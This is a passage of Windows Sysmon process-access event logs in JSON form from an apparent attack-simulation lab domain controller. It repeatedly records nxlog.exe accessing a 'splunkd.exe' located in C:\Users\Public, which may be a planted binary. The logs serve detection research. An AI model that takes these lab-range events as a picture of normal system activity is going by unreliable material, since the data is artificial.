C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:05.534","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:06","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6286,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:06.535\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:06.535","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6287,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:07.535\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:07.535","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6288,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:08.535\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:08.535","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6289,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:09.535\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:09.535","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6290,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:10.535\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:10.535","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6291,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:11.535\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:11.535","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files 